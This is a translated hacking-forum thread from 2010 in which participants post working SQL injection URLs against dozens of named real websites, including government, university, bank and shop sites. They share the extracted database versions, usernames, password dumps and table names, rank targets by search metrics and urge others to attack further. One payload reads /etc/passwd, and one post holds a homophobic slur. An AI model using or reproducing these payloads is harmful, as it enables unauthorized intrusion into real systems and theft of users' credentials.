http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,bank_code,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45+from+lcuseraccounts+--+
ТИЦ: 50 PR: 6
Department of Labour and Vocational Training of Libya
MSSQL
Code:
http://www.smpt.gov.ly/ViewNews.aspx?id=-221+union+all+select+'1',username,'3',password,'5' ,'6',null,'8','9'+from+users#
PR - 5
they put a lot of effort into coming up with the passwords
ТИЦ 80 PR 7
http://www.nativeweb.org/resources.php?type=1+union+select+1,2,concat_ws(0x 3a, password,loginname),4,5, 6,7+from+users--
<Cyber-punk>
02.08.2010, 16:03
PR 3/10
ТИЦ 10
http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,version%28%29,User%28%29,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,2 6,27,28,29,30,31,32,33,34,35 ,36,37,38+--+
-=Zhenek=-
03.08.2010, 10:06
https://stat.net.kht.ru/result/stat.pl?action=calc&stat_login=***'+order+by+1--
'PostgreSQL 8.1.21 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.6:ViewUser:kray'
It may not open for some people, since this is the statistics site of the Dalsvyaz company
I'm not going to dig any further =)
Tomorrow I'll write to them about the bug, since I left tracks in the logs like an elephant(((
<Cyber-punk>
03.08.2010, 11:19
PR - 1
Code:
http://realmebel63.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://ulma-c.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.euro-com.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://cleanwin.org/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://classtv.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.sentimat.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
PR - 2
Code:
http://alvitek.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
PR - 3
Code:
http://gsdk9.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
Code:
http://www.medvedi-pc.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,pas sword,7,8,9,1 0,11+from+%23__users%23
-PRIVAT-
03.08.2010, 11:50
http://www.auto-tambov.ru/auto-internet-magazin.php?id=-15-1+union+select+1,2,3,4,5,table_name,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tabl es+limit+29,1--
ТИЦ10YC(R2) PR3
http://www.line.com.ua/magazin.php?id=-9-1+union+select+1,table_name,3+from+information_sch ema.tables+limit+30,1 --
ТИЦ10(R2)
Repost
ТИЦ 200
http://webnata.ru/blog/more.php?article=-26-1+union+select+1,2,3,4,5,6,7,8,9%20--
http://www.prodazhadvd.com/catalog/store/more.php?id=-5305-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3%20--
http://www.russian-stories.com/more.php?mode=full&id=-96+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6%20--
PR1
Repost
ТИЦ10(R2) PR1
http://osloboda.ru/!objekt/more.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4 --
PR1
http://www.zavesa.info/more.php?id=-1093+union+select+1%20--
http://arosa.am/more.php?lang=1&id=18+union+select+1,2,3,4,5%20--
PR3
http://oborudinfo.com/more.php?id=669+union+select+1,2,3,4,5,6,7,8,9,10% 20--
Repost
PR2
http://www.bim.kr.ua/more.php?id=-37-1+union+select+1,2,3,4,5,6 --
PR2
http://www.tfx.ru/more.php?id=-214+union+select+1,2,3,4,5%20--
http://www.tortuga96.ru/more.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1%20--
http://znak.kr.ua/more.php?id=-9+union+select+1,2,3,4%20--
http://www.rusdolgnadzor.ru/sectors/more.php?id=-7+union+select+1,table_Name,3+from+information_sch ema.tables+limit+42,1%20--
ТИЦ30(R3) PR3 AR9439063
http://www.radexpro.ru/more.php?id=-3+union+select+1,2,3,4,5,group_concat%28column_nam e%29,7,8+from+information_schema.columns+where+tab le_name=0x70687062625F7573657273%20--
ТИЦ10(R2) PR4
http://www.illustratorsgallery.biz/illustrator/more.php?ID=-689+union+select+1,2,3,4,5,6,7,8 --
PR2
Repost
http://www.usadiba.ru/dom.php?id=-481+union+select+1,2,3,4,5,6,7,8 --
ТИЦ10(R2) PR2 AR19886775
check your SQL injections with the anti-repost checker before posting, this applies to everyone!
daniel_1024
03.08.2010, 15:58
Code:
http://www.parfyme.ru/index.php?id=158+and+1=0+union+select+unhex(hex(ve rsion()))--
PR: N/A ТИЦ: 0
Database Version: 5.0.89-Max-log
Database name: srv13147_sql1
User name: srv13147_diman@c11-w.ht-systems.ru
OC type: unknown-linux-gnu
Code:
http://www.parkiet.bialystok.pl/page_edit_product.php?ID=64&kategoriaID=1&podkategoriaId=1509+and+1=0+union+select+version() ,2,3,4,5,6,7,8,9,10--
PR: 2 ТИЦ: 0
Database Version: 5.0.90-log
Database name: baza14270
User name: admin14270@85.128.140.40
OC type: unknown-linux-gnu
Code:
http://yaroslavl.ecologyandculture.ru/index.php?id=5+and+1=0+union+select+version()--
PR: 5 ТИЦ: 40
Database Version: 5.0.26-log
Database name: ecologyand_voron
User name: ecologyand_voron@localhost
OC type: pc-linux-gnu
Code:
http://raportowanie.pl/mainen/main.php?id=5009+and+1=0+union+select+1,2,3,4,vers ion(),6,7,8,9,10,11,12,13,14--
PR: 3 ТИЦ: 0
Database Version: 5.0.32-Debian_7etch12-log
Database name: mineralmidrange
User name: mineralmidrange@www-1.srv.noria.pl
OC type: pc-linux-gnu
Code:
http://www.nagazetnom.ru/index.php?id=20+and+1=0+union+select+version()--
PR: N/A ТИЦ: 50
Database Version: 5.0.24-standard
Database name: db_nagazetnom1
User name: nagazetnom1@localhost
Тиц 10
pr 3
http://housefan.de/videos.php?acc=Housefan.de&vid=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19&vkey=09f950750fd565dadeeeb&action=showvid
5.0.32-Debian_7etch12-log:housefan:housefan@localhostc-linux-gnu
http://www.aeheralds.net/rolls/Groups.php?id=-1+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),%20@@ve rsion_compile_os,version()),5,6,7,8,9,10--
Crown Principality of aeherald_aeheral@localhostc-linux-gnu:5.0.91-community
http://www.chinesecj.com/faq/faq.php?id=-2+UnIon+selECt+1,concat_ws(0x3a,user(),database(), version()),3,4+--+
chinesec_cjuser@localhost:chinesec_cj:5.0.91-community
pr5
http://rekguitars.com/english.php?site=dir&nr=-2+union+select+1,@@version_comment,@@datadir,@@tmp dir,@@version,user(),database(),@@version_compile_ os,@@version_compile_machine,@@warning_count,@@sys tem_time_zone,@@query_cache_size,13,14,15,16,17,18
moodoone
04.08.2010, 17:55
Code:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,5,6,7--
Code:
http://www.submission-ragecage.dk/news/news.display.php?id=38-999.9+union+select+1,2,3,4,concat(username,char(58 ),user_password),6,7+from+phpbb_users--
PR: 3
ТИЦ: 10
CyberHunter
04.08.2010, 17:57
http://www.mundocapoeira.ru/index.php?area=news&id=-176+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4--+
5.0.32-Debian_7etch12-log:capoeira_site:capoeira@localhost
http://www.kupitam.by/catalog.php?id=173+and+1=0+union+select+1,2,3,4,5, 6,7,8,concat(username,char(58),user_password),10,1 1,12,13,14,15,16,17,18,19,20+from+phpbbnew_users--
PR 5
ТИЦ 750
Code:
http://www.tatarstan.net/index.phtml?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6+--
tatarstan@localhost:tatarstan:5.0.90
expressindia.com
PR - 8
a vulnerability in the no longer existing project community.expressindia.com:
Code:
http://community.expressindia.com/myindia/message_popup.php?postId=-42612+union+select+null,null,name||chr(58)||passwo rd||chr(58)||email+from+mboard_user+limit+1+offset +0--+
some of the passwords also work for the main page ;-)
sql inj is also present in the online shop hosted on expressindia.com:
there is no access to pg_shadow, but something useful can still be extracted... for example the passwords of the shop's sellers (in base64 format, as I understand it)
Code:
http://shopping.expressindia.com/index.php?page=listing&catId=-650+union+select+null,name||chr(58)||password||chr (58)||email,null,null,null,null,null,null+from+sel ler--+
db - PostgreSQL
in general the site, it seemed to me, has quite a few more holes... if anyone wants to take it further - u r welcome
http://www.ratlankiai.lt/product.php?&lng=lt&pid=-724+union+select+1,2,3,4
---
shop
http://www.dinitrol.lt/straipsnis.php?id=10+union+select+1,2,aes_decrypt( aes_encrypt(concat_ws(0x3a,version(),@@version_com pile_os,@@version_compile_machine,@@version_commen t),1),1),4,5
PR 2
Code:
http://www.kappaargentina.com.ar/seccion2.php?id=-1+union+select+concat_ws%280x3a,database%28%29,use r%28%29,version%28%29%29%20--
uv5019_kappa:uv5019@us30.toservers.com:4.1.14-log
ТИЦ 20
PR 3
Shop
Code:
http://www.top7.ru/shop/buy/guides/?id=-1+union+select+1,concat_ws%280x3a,database%28%29,u ser%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35%20--
top7:root@localhost:5.4.1-beta
www.stroyposad.ru - Stroyservis. Construction group
Yandex тИЦ: 10
Google PageRank: 2
Code:
http://www.stroyposad.ru/news/newfir.php?new_id=57+UNION+SELECT+1,2,3,CONCAT_WS( CHAR(32,58,32),user(),database(),version()),5,6,7--
u14919@10.8.0.26 : u14919 : 5.0.90-log
-PRIVAT-
05.08.2010, 16:05
http://www.unimak.ee/klient.php?id=-107+union+select+1,2--+
PR3
http://www.zemsta-jest-slodka.pl/poortal/klient.php?id=22+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
PR2
http://www.zahorie.com/klient.php?id=-279+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+--+
PR3
http://volleynet.dk/klient/nyheder-klient.php?id=85+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0%20+--+
PR4
http://www.suisunrcd.org/permit.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
PR4
http://invest-market.kz/deposit/bank.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9--
ТИЦ 30 PR1
Invest-Market.kz: earn and keep your money, mutual funds (PIF), pension funds (NPF), deposits (banks), financial consulting, investor school, returns, ratings, investments, capital
http://www.goldenroast.com.au/restaurant.php?id=-44+union+select+1,2,3,4,5,6,7%20+--+
ТИЦ 10 PR3
http://www.towerclub.com.ph/restaurant.php?id=-1+union+select+1,table_name,3,4,5,6%20FROM%20INFOR MATION_SCHEMA.TABLES+limit+0,1%20--
PR4
http://www.purplemobilephones.co.uk/tariff.php?id=-3400232+union+select+1,2,3,4,5,concat_ws%280x3a,id ,user,pass%29,7,8,9,0,1,2,3,4,5,6,7+from+admin%20--
PR4
[Feldmarschall]
06.08.2010, 00:03
Code:
http://www.epi.ch/page.php?pages_id=-9'+union+select+concat(version()),2,3,4,5,6 and '1'='1
Version: 5.0.87-d10-ourdelta65-log
User: epi@localhost
Database: epi
http://www.pivot-point.edu.au/content.php?id=-19'+union+select+1,2,3,4,5,concat_ws(0x3a,user(),d atabase(),version()),7,8,9,10,11,12,13,14,15,16/*
piv-point@localhostiv_point1:4.1.22
http://telnikfest.ru/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
http://xpffb.com/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
http://antidarvin.com/modules/galleri/viewcat.php?id=6&cid=-1+union+select+1,user()
http://www.odinochestvo-v-seti.ru/modules/galleri/viewcat.php?cid=-1+union+select+1,user()
moodoone
06.08.2010, 14:36
Code:
http://www.comprousa.com/en/news_view.php?id=-8+union+select+1,group_concat(table_name),3,4+from +information_schema.tables--
Pr: 4
Тиц: 275
Code:
http://www.paintballxxl.com/news_view.php?id=-1202+union+select+1,2,3,4,concat_ws(0x3a,login,pas s),6+from+user+limit+1,1--
Pr: 3
Тиц: 130
Code:
http://www.ettu.org/news_view.php?id=-2443+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16--
Pr: 6
Тиц: 190
-PRIVAT-
06.08.2010, 15:15
http://www.pihenes.com/apro/page_print.php?id=-1510+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2 --
PR4
http://dront.net/uru/page_print.php?id=-623+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1--
PR1
http://www.marijvanoverbeek.nl/page_print.php?id=6+union+select+1,2,3,4,5,6,7%20--
PR2
http://www.mesta-vstrech.ru/mesto.php?id=-255+union+select+1,2,3,4,5,6,group_concat%28table_ name%29,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6+from+information_schema.tables--
ТИЦ 20 PR2
moodoone
06.08.2010, 15:55
Code:
http://www.profcosmetology.ru/preview.php?id=-759+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,gro up_concat(column_name),15,16,17,18,19,20,21,22,23, 24+from+information_schema.columns+where+table_nam e=0x74625F75736572--
Table: tb_user
PR: 3
ТИЦ: 30
Code:
http://www.invibio.com/press-room/releases-preview.php?id=-74+union+select+1,2,3,group_concat(table_name),5,6 ,7,8,9,10+from+information_schema.tables--
PR: 5
Code:
http://www.dvdfuture.com/review.php?id=-805+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--
PR: 4
ТИЦ: 10
Code:
http://www.jaxmovies.com/review.php?id=-71+union+select+1,2,version(),4,5,6,7,8,9,10,11--
PR: 3
ТИЦ: 10
Code:
http://orthodoxyinamerica.org/article.php?id=-25+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8--
PR-5
ТИЦ-10
Code:
http://www.saveoureverglades.org/article.php?id=-16+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53+--+
PR-5
Code:
http://www.zvyazda.minsk.by/ru/issue/article.php?id=-60634+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20--
PR: 6
ТИЦ: 550
Konqi: how many times do I have to repeat it? check with the anti-repost checker!!
There's this little site in St. Petersburg that offers at-home X-ray services; it turns out they are scammers who rip off pensioners and other people, they don't do any X-ray at all and hand over fake images, and the service costs 4000 rubles. Their site was briefly shown on TV in the news, more details here (http://spb.kp.ru/daily/24535.4/678745/)
The site itself is full of holes; whoever has the skills and the desire, punish them.
Code:
http://www.vrachnadomu.ru/?page=main&lang=rus&id=59999+union+select+1,2,version(),4,5,6,7,8,9--
PR 5
Code:
http://digilib.its.ac.id/detil.php?id=-5719+UnIon+selECt+version%28%29,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47+--+
5.0.51a-24+lenny2
P.S. It has something to do with payment... Either a shop or payment for a hotel, no idea, basically.
http://www.flacso.org.ec/html/program.php?id_programa=-1003+union+select+1,aes_decrypt(aes_encrypt(load_f ile('/etc/passwd'),1),1),3,4,5,6&ID=DC_0
File_priv = Y
mq = Off
PR-6
PR 5
Code:
http://www.citizenworks.org/news/index.php?id=-112+union+select+1,2,concat_ws(0x3a,version(),user (),@@version_compile_os),4+--+
4.0.27-log:xcitizenworks@sonic.futurequest.netc-linux-gnu
Code:
http://www.citizenworks.org/news/index.php?id=-112+union+select+1,2,group_concat(user_name,0x3a,p assword),4+from+user--+
-PRIVAT-
07.08.2010, 16:56
http://www.aviafond.ru/partner.php?id=-22+union+select+1,2,user%28%29,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5%20--
ТИЦ 160 PR 4
http://www.rifinfo.ru/print_news.php?id=-13424+union+select+1,2,3,4,4,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 %20+--+
ТИЦ 190 PR 3
http://www.accessexperts.net/show_news.php?id=-79+union+select+1,2,3,4,5,6 --
PR 3
http://www.wpb.org/park/park.php?id=58+union+select+1%20+--+
ТИЦ 10 PR 5
http://www.gbca.com/employment/job.php?id=-508+union+select+1,2,3,4,5,6,7,8,9,0,1--
PR 4
shop
http://www.odysea.com/shop/product.php?id=-15+++union+select+++1,2,3,4,5,6,version() ,8,9,10,11,12,13,14,15,16,17,18,19--
database: odys0001
[Feldmarschall]
08.08.2010, 05:38
online shop
Code:
https://www.canyonsports.com/shop/search.asp?q=ID')+OR+1=(select+top+1+table_name+fr om+information_schema.tables)--
MSSQL Version:
Code:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
181 databases
Code:
https://www.canyonsports.com/shop/search.asp?q=ID')+OR+1=(select+db_name(181)--
PR 4
Code:
http://hydro4africa.info/news/viewnews.php?ID=-452+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 2
Code:
http://wind4africa.info/news/viewnews.php?ID=-282+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 4
Code:
http://biomass4africa.net/news/viewnews.php?ID=-539+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 3
Code:
http://solar4africa.net/news/viewnews.php?ID=-533+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),@@version_compile_os),10,11,12,13 ,14+--+
5.1.47::renewabl_webuser@localhost::unknown-linux-gnu
PR 4
Code:
http://www.bswy.us/whatNew.php?id=-34+union+select+1,2,concat_ws(0x3a3a,version(),use r(),@@version_compile_os),4,5,6--+
5.1.39-log::beringia@store.dollen.com:c-linux-gnu
PR 5
http://риэл-авто.рф/viewcars.php?carid=779 and 1=2 union select 1,2,3,concat_ws(0x3a,user(),database(),version()), 5,6,7,8,9,10 -- 1
rielautoru@192.168.2.223:rielautorudb:4.1.22-log
http://www.tijuana.gob.mx/transparencia/VerRespuestaTransparencia.asp?f=(select+top+1+@@ve rsion%2Bdb_name()+table_name+from+information_sche ma.columns)
http://www.shomershabes.com/service/eng.asp?es=122&eh=&eh2=&nh=0&nh2=0&p=Ukraine&cid=-120+union+all+select+1,cast(table_name+as+text)+fr om+information_schema.columns--
PR 3
Code:
http://www.competitionclutch.com/products/index.php?id=-1100+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x2b,v ersion(),user(),@@version_compile_os),10,11,12+--+
5.0.91-log+competition@97.74.24.204+unknown-linux-gnu
PR 5
Code:
http://www.cfijerusalem.net/index.php?id=-6.0+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x2b, version(),user(),@@version_compile_os),11+--+
5.0.81-log+dbo246170887@74.208.16.204+pc-linux-gnu
PR 5
Code:
http://www.newenglandapples.org/index.php?id=-35+union+select+concat_ws(0x2b,version(),user(),@@ version_compile_os)+--+
4.1.20+appleadmin@localhost+redhat-linux-gnu
Code:
http://www.nashcc.edu/index.php?option=com_remository&Itemid=248&func=startdown&id=299+or+1+group+by+concat((SELECT+password+from+ mos_users+limit+0,1),rand(0)|0)+having+avg(0)+--+
pr 6
Dig in, guys!
http://robgru.allhyper.com/webdesign/index.php?id=6+union+select+1,@@version_compile_os
-PRIVAT-
09.08.2010, 18:54
http://www.sovaco.com.vn/print_news.aspx?id=-344+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3+--+
PR 1
http://www.ghananewsmonthly.com/print_news.asp?id=1%20or%201=@@version--
PR 4
Microsoft OLE DB
http://www.oscebih.org/public/print_news.asp?id=66+or+1=@@version--
PR 7
Microsoft VBScript
http://www.bizghana.com/print_news.asp?id=377966+or+1=@@version--
Microsoft OLE DB
http://www.queens.edu/print_news.asp?press_id=1%20or%201=@@version
Microsoft VBScript
http://www.invacanzanelsalento.com/print_news.asp?id=-80+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
Microsoft OLE DB
http://www.effectgroep.nl/eventformats/print_news.asp?id=66+or+1=@@version--
Microsoft OLE DB
PR 3
http://www.hlv.de/News/print_news.asp?ID=416+or+1=@@version--
Microsoft OLE DB
PR 4
http://twitgift.ly/send-gift.php?id=-30+union+select+1,concat(id,char(58),twitterUserNa me),3,4,5+from+user
http://www.aljamahiria.com/nas.php?count=32&id_pages=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--
http://www.ecom.org.la/news.php?col=1&id=-2837+union+select+1,2,version(),4,5,6,7
Code:
http://afghanistan.ru/doc.xhtml?id=-3372+union+select+concat_ws(0x3a,username,passwd), 2,3,4,5,6,7,8,9,0,1+from+enter_users--+
Code:
http://afghanistan.ru/doc.xhtml?id=-3372+union+select+concat_ws(0x3a,nick,passwd),2,3, 4,5,6,7,8,9,0,1+from+f_users--+
тИЦ -750
moodoone
10.08.2010, 15:24
Code:
http://www.disguises.com.au/look.php?ID=-39+UnIon+selECt+1,version(),3,4,5,6+--+
PR:3
P.S. The output is interesting)
stepashka_
10.08.2010, 16:29
My first SQLi..
http://www.zadvigka.ru/ind.php?pn=53&id_categ=-9+UNION+SeLeCt+1,2,3,4,5,concat_ws(0x3a3a,version( ),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1--+
тИЦ: 20
And here's the second one..
http://bel-shop.com/doska7/ind.php?pn=8&id_typ=-39+UNION+SELECT+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+FROM%20INFORMAT ION_SCHEMA.TABLES--+
тИЦ: 80
And off we go..
http://www.vip-doski.ru/ind.php?pn=0&id_typ=-126+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29+FROM%20INFORMATION_SCHEMA.TABLES--+
тИЦ: 20
http://www.infoboard.reporter-studio.ru/ind.php?pn=34&id_categ=-2+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+F ROM%20INFORMATION_SCHEMA.TABLES--+
тИЦ: 550
http://www.vip-doski.ru/ind.php?pn=0&id_typ=-16+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),user(%20),version()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29--+
sexsex_doska1:sexsex_doska@localhost:5.1.48
тИЦ: 20
Damned freaks
Homosexuals.
http://www.get-it-gay.at/update/detail.php?nr=-1+union+select+concat_ws(0x3a3a,adv_uname,adv_pass ),2,3,4+from+getitgay_mod__user+limit+0,1--&rubric=Update&
PR 2
Code:
http://www.go4get.com/add_go4board.php?id=-808+union+select+1,concat_ws(0x2b,version(),user() ,@@version_compile_os),3,4,5,6,7,8,9,10+--+
5.0.22-log+niaawgo123_niaaw@localhost+unknown-freebsd6.0
PR 5
Massachusetts Institute of Technology
Code:
http://burgaz.mit.edu/getpaper.php?id=-273+union+select+concat_ws(0x2b,version(),user(),@ @version_compile_os),2,3--+
File /var/www/PUBLICATIONS/5.0.67-0ubuntu6+mysql@18.82.1.16+debian-linux-gnu not found or inaccessible!
http://liblive.ru/?id=-1+union+select+1,2,concat_ws(0x3a,database(),user( ),version()),4,5,6+--+
liblive:liblive@localhost:5.0.45-community-nt
SofiaLoar
11.08.2010, 22:50
http://www.spblove.ru/full_show.php?table=ankets&id=-1+union+select+1,concat_ws(0x3a,mail,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,version(),28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42+from+iankets+--
PR - 4
http://www.rwmartialcombat.com/popup-fighters.php?id=-52+UnION+SELeCT+1,group_concat%28username,0x3a,pas sword%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21+fRom+users%20--+
Мослаем...
pr4
http://www.cinefish.bg/programa_film.php?city=%CF%EB%EE%E2%E4%E8%E2&day=1&movie_id=-1+union+select+user()--
db user: cinefish@10.0.0.141
http://www.nevada211.org/sup.php?id=-5'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,version(),22,23,24,25,26,27--+
Branch 4
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
and also
http://www.koeln-stadt.de/cgi-bin/safe.pl?NAV=-1+union+select+1,2,3,4/*
Database Version: 4.0.27-standard
Database name: db179060028
User name: dbo179060028@localhost
5.1.45-0
Code:
http://www.riverhousemini.com/occasions/mini_sold.php?id_cartype=-3%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9 ,10,11,12,13,14,15,16,17,18,19
stepashka_
12.08.2010, 10:48
http://www.mirdosok.ru/ind.php?pn=1&id_typ=-191+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FR OM%20INFORMATION_SCHEMA.TABLES--+
5.0.87-percona-highperf-log : plaster@localhost
тИЦ: 10
http://doska.k-gb.ru/ind.php?pn=1&id_typ=-159+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),user(),version()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26--+
gena:root@localhost:5.0.45
тИЦ: 20
http://www.glavmetall.ru/board2/ind.php?pn=3&id_typ=-18+union+select+1,2,3,4,5,6,concat_ws(0x3a,databas e(),user(),version()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
wwwglavmetallru:glavmeta@localhost:4.1.25-log
тИЦ: 10
Мор0к said:
PR6
ТИЦ 900
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,user(),27--
u217628@10.10.227.93
Code:
http://www.rae.ru/fs/?section=content&op=show_article&article_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,concat_ws%280x3a,us er_login,user_password%29,27+from+u217628_econf.fo rum_users--+
This is from the table
Code:
u217628_econf:forum_users
Where do you log in
-PRIVAT-
12.08.2010, 10:54
http://liberot.ru/autor.php?id=2&autor=56&poem=482+union+select+1,2,3,4 +--+
ТИЦ 10
http://liberato.ru/autor.php?id=12+union+select+1,2,3,4--
ТИЦ 20 PR 1
http://reading-hall.ru/autor.php?id=-86+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2+f rom+information_schema.tables+limit+22,1 --
ТИЦ 30 PR 4
http://libavtograd.tgl.ru/autor.php?id=-78+union+select+1,2,group_concat%28table_name%29,4 ,5,6,7,8,9+from+information_schema.tables+--
ТИЦ 500 PR 4
http://www.mg-photo.ru/school/konkurs/autor.php?id=-257+union+select+1,2,3,4,5,6+--+
ТИЦ 30 PR 2
http://www.boerboel-club.ru/document.php?id=-48+union+select+1,concat_ws%280x3a,user_id,user_na me,user_password%29,3,4,5,6,7,8,9+from+CPG_users--
ТИЦ 80 PR 2
http://www.garantcentre.ru/document.php?id=23126+union+select+1,2,3,4,5--
ТИЦ 10
http://www.reznik.pri.ee/document.php?id=100+union+select+1%20+--+
ТИЦ 30 PR 2 Dmitry Reznik's page
